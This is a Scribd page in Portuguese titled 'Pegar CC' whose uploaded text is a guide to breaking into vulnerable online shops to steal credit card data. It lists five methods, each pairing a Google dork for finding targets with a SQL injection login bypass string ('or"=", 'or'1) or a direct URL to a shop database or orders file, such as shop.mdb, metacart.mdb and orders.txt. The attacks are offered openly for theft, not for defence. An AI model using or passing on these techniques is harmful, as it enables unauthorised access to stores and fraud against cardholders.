Scribd Logo
Carregar

Bem-vindo(a) ao Scribd!

  • 2K visualizações

    Pegar CC

    Enviado por

    Vitor ff mobaile
    O documento lista cinco técnicas para explorar vulnerabilidades em sites e obter acesso a bancos de dados com cartões de crédito. As técnicas incluem substituir partes de URLs para acessar páginas de administração ou baixar diretamente bancos de dados, e usar strings vazias ou '1' como usuário e senha para fazer login caso haja falhas de autenticação.

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato PDF, TXT ou leia online no Scribd

    Pegar CC

    Enviado por

    Vitor ff mobaile
    2K visualizações1 página
    O documento lista cinco técnicas para explorar vulnerabilidades em sites e obter acesso a bancos de dados com cartões de crédito. As técnicas incluem substituir partes de URLs para acessar páginas de administração ou baixar diretamente bancos de dados, e usar strings vazias ou '1' como usuário e senha para fazer login caso haja falhas de autenticação.

    Título original

    388609603-Pegar-cc

    Direitos autorais

    © © All Rights Reserved

    Formatos disponíveis

    PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    O documento lista cinco técnicas para explorar vulnerabilidades em sites e obter acesso a bancos de dados com cartões de crédito. As técnicas incluem substituir partes de URLs para acessar páginas de administração ou baixar diretamente bancos de dados, e usar strings vazias ou '1' como usuário e senha para fazer login caso haja falhas de autenticação.

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato PDF, TXT ou leia online no Scribd
    Fazer download em pdf ou txt
    2K visualizações1 página

    Pegar CC

    Enviado por

    Vitor ff mobaile
    O documento lista cinco técnicas para explorar vulnerabilidades em sites e obter acesso a bancos de dados com cartões de crédito. As técnicas incluem substituir partes de URLs para acessar páginas de administração ou baixar diretamente bancos de dados, e usar strings vazias ou '1' como usuário e senha para fazer login caso haja falhas de autenticação.

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato PDF, TXT ou leia online no Scribd
    Fazer download em pdf ou txt
    Você está na página 1de 1

    Vou deixar aqui alguns exploits que podem ser usados para ter acesso a um site

    vulner�vel e pegar as CC's.

    Primeira maneira

    google dork --> inurl:"/cart.php?m="


    como a url deve ser --> http://alvo.com/store/cart.php?m=view
    falha --> troque o cart.php?m=view por /admin
    pagina de login do adm --> http://abc.com/store/admin
    username : 'or"="
    Password : 'or"=
    se o site estiver vulner�vel voc� ir� logar como admin na shop.

    Segunda maneira

    google dork --> inurl:"Lobby.asp"


    como a url deve ser --> http://www.alvo.com/mall/lobby.asp
    falha --> mude a parte /mall/lobby.asp para /fpdb/shop.mdb
    url com a falha --> http://www.alvo.com/fpdb/shop.mdb
    se o site estiver vulner�vel o download do db ir� iniciar

    Terceira maneira

    google dork :--> inurl:"/shopadmin.asp"


    como a url deve ser --> http://www.alvo.com/shopadmin.asp
    user : 'or'1
    pass : 'or'1
    ter� acesso ao db admin se o site estiver vulner�vel

    Quarta maneira

    google dork --> allinurl:/metacart/


    url do alvo --> http://www.alvo.com/metacart/about.asp
    alvo --> /database/metacart.mdb
    url com a falha --> http://www.abc.com/metacart/database/metacart.mdb
    download do db se o site estiver vul

    Quinta maneira

    google dork --> allinurl:/DCShop/


    url do alvo --> http://www.alvo.com/xxxx/DCShop/xxxx
    falhas --> /DCShop/orders/orders.txt ou /DCShop/Orders/orders.txt
    url com a falha --> http://www.alvo.com/xxxx/DCShop/orders/orders.txt ou
    http://www.alvo.com/xxxx/DCShop/Orders/orders.txt

    Você também pode gostar